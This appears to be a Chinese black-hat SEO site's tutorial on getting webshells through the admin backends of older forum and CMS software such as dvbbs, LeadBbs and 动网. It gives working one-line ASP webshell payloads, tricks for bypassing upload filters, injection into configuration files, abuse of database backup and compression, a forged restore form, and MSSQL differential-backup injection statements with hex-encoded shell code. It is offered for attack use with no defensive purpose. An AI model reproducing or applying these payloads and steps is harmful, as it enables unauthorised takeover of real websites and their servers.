首页/WebShell/正文
后台拿WebShell的常用方法 一

 2022年04月08日 13:10:22  阅读 423  评论 0

摘要:一、直接上传获得 webshell 这种对 php 和 jsp 的一些程序比较常见,MolyX BOARD 就是其中一例,直接在心情图标管理上传.php 类型,虽然没有提示,其实已经成功了,上传的文 件 url 应该是 http://forums/images/smiles/下,前一阵子的联众游戏站和网易的 jsp 系统漏洞就可以直接上传 jsp 文件。文件名是原来的文件名,bo-blog 后台可以可以直接上传.php 文件,上传的文件路径有提示。以及一年前十分流行的 upfile.a


一、直接上传获得 webshell 

这种对 php 和 jsp 的一些程序比较常见,MolyX BOARD 就是其中一例,直接在心情图标管理上传.php 类型,

虽然没有提示,其实已经成功了,上传的文 件 url 应该是 http://forums/images/smiles/下,前一阵子

的联众游戏站和网易的 jsp 系统漏洞就可以直接上传 jsp 文件。文件名是原来的文件名,bo-blog 后台可

以可以直接上传.php 文件,上传的文件路径有提示。以及一年前十分流行的 upfile.asp 漏洞(动网 5.0 和

6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传 webshell 到网站任意可写目录

中,从而拿到网站的管理员控制权限。


二、添加修改上传类型

现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,bbsxp

后台可以添加 asa|asP 类型,ewebeditor 的后台也可添加 asa 类型,通过修改后我们可以直接上传 asa 后

缀的 webshell 了,还有一种情况是过滤了.asp,可以添加.aspasp 的文件类型来上传获得 webshell。php

系统的后台,我们可以添加.php.g1f 的上传类型,这是 php 的一个特性,最后的哪个只要不是已知的文件

类型即可,php 会将 php.g1f 作为.php 来正常运行,从而也可成功拿到 shell。LeadBbs3.14 后台获得

webshell 方法是:在上传类型中增加 asp ,注意,asp 后面是有个空格的,然后在前台上传 ASP 马,当然

也要在后面加个空格!


三、利用后台管理功能写入 webshell

上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入 webshell。比较的

典型的有 dvbbs6.0,还有 leadbbs2.88 等,直接在后台修改配置文件,写入后缀是 asp 的文件。而

LeadBbs3.14 后台获得 webshell 另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,

最小马前后要随便输入一些字符,http:\\网站\inc\IncHtm\BoardLink.asp 就是我们想要的 shell。


四、利用后台管理向配置文件写 webshell

利用"""":""//"等符号构造最小马写入程序的配置文件,joekoe 论坛,某某同学录,沸腾展望新闻系统,

COCOON Counter 统计程序等等,还有很多 php 程序都可以,COCOON Counter 统计程序举例,在管理邮箱处

添上 cnhacker at 263 dot net":eval request(chr (35))//, 在配制文件中就是 webmail="cnhacker at 263 

dot net\":eval request(chr(35))//",还有一种方法就是写上

cnhacker at 263 dot net"%><%eval request(chr(35))%><%',这样就会形成前后对应,最小马也就运行

了。<%eval request(chr(35))%>可以用 lake2 的 eval 发送端以及最新的 2006 客户端来连,需要说明的

是数据库插马时候要选前者。再如动易 2005,到文章中心管理-顶部菜单设置-菜单其它特效,插入一句话

马"%><%execute request("l")%><%',保存顶部栏目菜单参数设置成功后,我们就得到马地址 http://网 站/admin/rootclass_menu_config.asp。


五、利用后台数据库备份及恢复获得 webshell

主要是利用后台对 access 数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量

没有过滤导致可以把任意文件后缀改 为 asp,从而得到 webshell,msssql 版的程序就直接应用了 access

版的代码,导致 sql 版照样可以利用。还可以备份网站 asp 文件为其他后缀 如.txt 文件,从而可以查看

并获得网页源代码,并获得更多的程序信息增加获得 webshell 的机会。在实际运用中经常会碰到没有上传

功能的时 候,但是有 asp 系统在运行,利用此方法来查看源代码来获得其数据库的位置,为数据库插马来

创造机会,动网论坛就有一个 ip 地址的数据库,在后台的 ip 管理中可以插入最小马然后备份成.asp 文件

即可。在谈谈突破上传检测的方法,很多 asp 程序在即使改了后缀名后也会提示文件非法,通过在.asp 文

件头加上 gif89a 修改后缀为 gif 来骗过 asp 程序检测达到上传的目的,还有一种就是用记事本打开图片文

件,随便粘贴一部分复制到 asp 木马文件头,修改 gif 后缀后上传也可以突破检测,然后备份为.asp 文件,

成功得到 webshell。


六、利用数据库压缩功能

可以将数据的防下载失效从而使插入数据库的最小马成功运行,比较典型的就是 loveyuki 的 L-BLOG,在

友情添加的 url 出写上<%eval request (chr(35))%>, 提交后,在数据库操作中压缩数据库,可以成功压

缩出.asp 文件,用海洋的最小马的 eval 客户端连就得到一个 webshell。


七、asp+mssql 系统

这里需要提一点动网 mssql 版,但是可以直接本地提交来备份的。首先在发帖那上传一个写有 asp 代码的

假图片,然后记住其上传路径。写一个本地提交的表单,代码如下:

<form action=http://网站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post">
<p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>
<p>要复制到的位置:<input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="提交"></p> </form>

另存为.htm 本地执行。把假图片上传路径填在“已上传文件的位置”那里,想要备份的 WebShell 的相对

路径填写在“要复制到的位置”那里,提交就得到我们可爱的 WebShell 了,恢复代码和此类似,修改相关

地方就可以了。没有遇到过后台执行 mssql 命令比较强大的 asp 程序后台,动网的数据库还原和备份是个

摆设,不能执行 sql 命令备份 webshell,只能执行一些简单的查询命令。可以利用 mssql 注入差异备份

webshell,一般后台是显示了绝对路径,只要有了注入点基本上就可以差异备份成功。下面是差异备份的

主要语句代码,利用动网 7.0 的注入漏洞可以用差异备份一个 webshell,可以用利用上面提到的方法,将

conn.asp 文件备份成.txt 文件而获得库名。

差异备份的主要代码:

;declare at a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to di
[email protected]
;Drop table [heige];create table [dbo] dot [heige] ([cmd] [image])--
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--
;declare at a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup
database @a to [email protected] WITH DIFFERENTIAL,FORMAT--

这 段 代 码 中 , 0x626273 是 要 备 份 的 库 名 bbs 的 十 六 进 制 , 可 以 是 其 他 名 字 比 如 bbs.bak; 

0x3C2565786563757465207265717565737428226C2229253E 是<%execute request("l")%>的十六进制,是 lp

最小马;0x643A5C7765625C312E617370 是 d:\web\1.asp 的十六进制,也就是你要备份的 webshell 路径。

当然也可以用比较常见备份方式来获得 webshell,唯一的不足就是备份后的文件过大,如果备份数据库中

有防下载的的数据表,或者有错误的 asp 代码,备份出来的 webshell 就不会成功运行,利用差异备份是成

功率比较高的方法,并且极大的减少备份文件的大小。



版权声明:本文为 “黑帽百科” 原创文章,转载请附上原文出处链接及本声明;

原文链接:https://www.heimao.wiki/post/56179.html

标签:

发表评论:

关于我们
黑帽百科:黑帽seo百科,黑帽seo技术学习培训分享,黑帽SEO快排程序分享,定制。 SEO快速排名收录学习 老师qq:25496334
扫码关注
联系方式
全国服务热线:
地址:新加坡 - 市中心(Singapore City)乌节路
Email:[email protected]
邮编:
Copyright Your 黑帽百科.|网站地图.Some Rights Reserved.